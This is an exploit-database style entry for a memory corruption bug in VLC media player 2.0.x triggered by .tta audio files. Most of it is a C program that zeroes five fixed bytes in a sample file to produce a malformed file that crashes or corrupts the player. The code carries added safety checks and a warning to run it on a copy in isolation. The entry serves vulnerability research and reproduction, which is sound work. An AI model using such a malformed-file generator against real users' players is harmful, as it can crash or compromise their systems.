# Exploit Title: VLC v. 2.0.1.0 .tta Memory Corruption
# Date: 3/18/2012
# Author: Dan Fosco
# Vendor or Software Link: www.videolan.org
# Version: 2.0.1.0
# Category: local
# Google dork: n/a
# Tested on: Windows XP SP3 (64-bit)
# Demo site: n/a
Tested on stable 2.0, 1.1.11, 2.0.1.0 (newest release as of 3/15/2012)
#include <stdio.h>
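/*
 * Byte offsets in the input file that get overwritten with 0x00, kept in the
 * order the original listing wrote them. The page does not say which fields
 * of the .tta file these offsets fall in.
 */
static const long zeroed_offsets[] = { 10, 11, 26, 68, 59 };

/*
 * Overwrite the single byte at `offset` in `f` with 0x00.
 * Returns 0 on success, -1 if the seek or the write fails.
 */
static int zero_byte_at(FILE *f, long offset)
{
    if (fseek(f, offset, SEEK_SET) != 0)
        return -1;
    return fputc('\x00', f) == EOF ? -1 : 0;
}

/*
 * Crash-reproducer helper: rewrites the file named by argv[1] IN PLACE,
 * zeroing five bytes at fixed offsets. Per the page header, the resulting
 * malformed .tta file triggers memory corruption in the listed VLC versions;
 * the page names no fixed version, so confirm against the vendor advisory
 * before treating a build as unaffected.
 *
 * The input is modified destructively, so run this on a copy of the sample
 * and open the result only in an isolated test environment.
 *
 * Returns 0 on success, 1 on a usage error or any I/O failure.
 */
int main(int argc, char *argv[])
{
    /* The original dereferenced argv[1] unconditionally. */
    if (argc < 2) {
        fprintf(stderr, "usage: %s <copy-of-sample.tta>\n",
                argc > 0 ? argv[0] : "tta_patch");
        return 1;
    }

    /*
     * "r+b": update an existing file without truncating it. Binary mode
     * matters on Windows, where text-mode streams translate bytes and make
     * absolute byte offsets unreliable.
     */
    FILE *f = fopen(argv[1], "r+b");
    if (f == NULL) {
        /* The original passed a NULL stream straight to fseek() here. */
        perror(argv[1]);
        return 1;
    }

    for (size_t i = 0; i < sizeof zeroed_offsets / sizeof zeroed_offsets[0]; i++) {
        if (zero_byte_at(f, zeroed_offsets[i]) != 0) {
            perror(argv[1]);
            fclose(f);
            return 1;
        }
    }

    /* fclose() flushes buffered writes, so its failure means the patch may be incomplete. */
    if (fclose(f) != 0) {
        perror(argv[1]);
        return 1;
    }
    return 0;
}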
// Note: this program modifies an existing .tta file in place; sample .tta files can be found on the VideoLAN FTP server.